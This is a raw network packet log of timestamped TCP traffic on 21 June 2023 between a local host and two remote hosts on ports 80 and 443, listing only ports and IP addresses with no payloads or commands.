                                                                                                  Jun 21, 2023 20:24:04.165493011 CEST49714443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:04.174144030 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174205065 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174252987 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.174252987 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.174318075 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174365044 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174376011 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.174412012 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174468040 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.174581051 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174654007 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174712896 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.174720049 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.174773932 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.181103945 CEST49714443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:04.181154013 CEST44349714162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.181607008 CEST44349714162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.181674957 CEST49714443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:04.192284107 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.192352057 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.192399979 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.192460060 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.192460060 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.192466974 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.192610025 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.192656040 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.192684889 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.192718983 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.192804098 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.193814993 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.193864107 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.193922997 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.193928003 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.193995953 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.194063902 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.194173098 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.194241047 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.194313049 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.194329023 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.194397926 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.194567919 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.194955111 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.195003986 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.195049047 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.195097923 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.195112944 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.195378065 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.195772886 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.195821047 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.195867062 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.195897102 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.195914984 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.196548939 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.196621895 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.196629047 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.196671009 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.196721077 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.196729898 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.197326899 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.197370052 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.197432041 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.197479010 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.197491884 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.197526932 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.197607040 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.198213100 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.198261976 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.198308945 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.198343039 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.198355913 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.198425055 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.198999882 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199042082 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199080944 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199130058 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.199132919 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199194908 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.199701071 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199742079 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199795008 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199795961 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.199868917 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.199930906 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.200479031 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.200520039 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.200551987 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.200582981 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.209527969 CEST49714443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:04.235676050 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.235730886 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.235780001 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.235830069 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.235846043 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.235912085 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.236150026 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.236201048 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.236222029 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.236301899 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.236356974 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.236366987 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.236882925 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.236974001 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.237051010 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.237108946 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.237180948 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.237185955 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.237649918 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.237783909 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.237831116 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.237860918 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.237876892 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.237885952 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.238559961 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.238610983 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.238656998 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.238702059 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.238707066 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.238743067 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.239593983 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.239641905 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.239689112 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.239727020 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.239738941 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.239924908 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.240180969 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.240251064 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.240340948 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.240394115 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.240394115 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.240411043 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241003036 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241050005 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241087914 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.241099119 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241147995 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241209984 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.241770983 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241820097 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241868019 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.241910934 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.241910934 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.241914034 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.242528915 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.242599964 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.242609024 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.242657900 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.242717028 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.242748976 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.243284941 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.243357897 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.243568897 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.243619919 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.243685961 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.243695021 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.243746042 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.243807077 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.244191885 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.244240046 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.244318962 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.244328022 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.244379997 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.245168924 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.249813080 CEST44349714162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.249907017 CEST44349714162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.250020027 CEST49714443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:04.252752066 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.252808094 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.252852917 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.252902031 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.252943993 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.252994061 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.253220081 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.253302097 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.253346920 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.253367901 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.253400087 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254039049 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254089117 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254125118 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.254136086 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254153967 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.254184961 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254725933 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254776001 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254808903 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.254823923 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254842997 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.254873037 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.254931927 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.255537033 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.255578041 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.255649090 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.256712914 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.256788969 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.256839991 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.256859064 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.256928921 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.257153034 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.257203102 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.257225037 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.257250071 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.257296085 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.257328987 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.257364035 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.257950068 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258025885 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258074999 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258100986 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.258125067 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258472919 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258513927 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258543968 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.258557081 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258574009 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.258599043 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.258682013 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.259469986 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.259514093 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.259552002 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.259584904 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.259593964 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.260169983 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.260220051 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.260247946 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.260284901 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.260298014 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.260343075 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.260808945 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.260890007 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.274501085 CEST49714443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:04.274532080 CEST44349714162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277442932 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277503014 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277550936 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277595043 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.277616978 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.277616978 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277668953 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277728081 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.277745008 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277796030 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277841091 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277851105 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.277889013 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277940035 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277985096 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.277987003 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.278036118 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278081894 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278086901 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.278134108 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278146982 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.278687954 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278731108 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278747082 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.278772116 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278814077 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278829098 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.278856993 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278898001 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.278937101 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.278939962 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279541969 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279582024 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279597044 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.279625893 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279664993 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279678106 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.279702902 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279710054 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.279743910 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279782057 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.279828072 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.280407906 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.280450106 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.280488014 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.280503988 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.280531883 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.280574083 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.280586004 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.280615091 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.280622959 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.280658007 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.280719995 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.281296015 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.281337023 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.281377077 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.281419039 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.281423092 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.281460047 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.281501055 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.281514883 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.281543970 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.281593084 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.282186031 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.282227039 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.282268047 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.282305956 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.282336950 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.282346010 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.282357931 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.282387018 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.282404900 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.282428980 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.282485008 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.283055067 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.283094883 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.283134937 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.283159971 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.283175945 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.283215046 CEST8049713104.21.18.99192.168.2.4
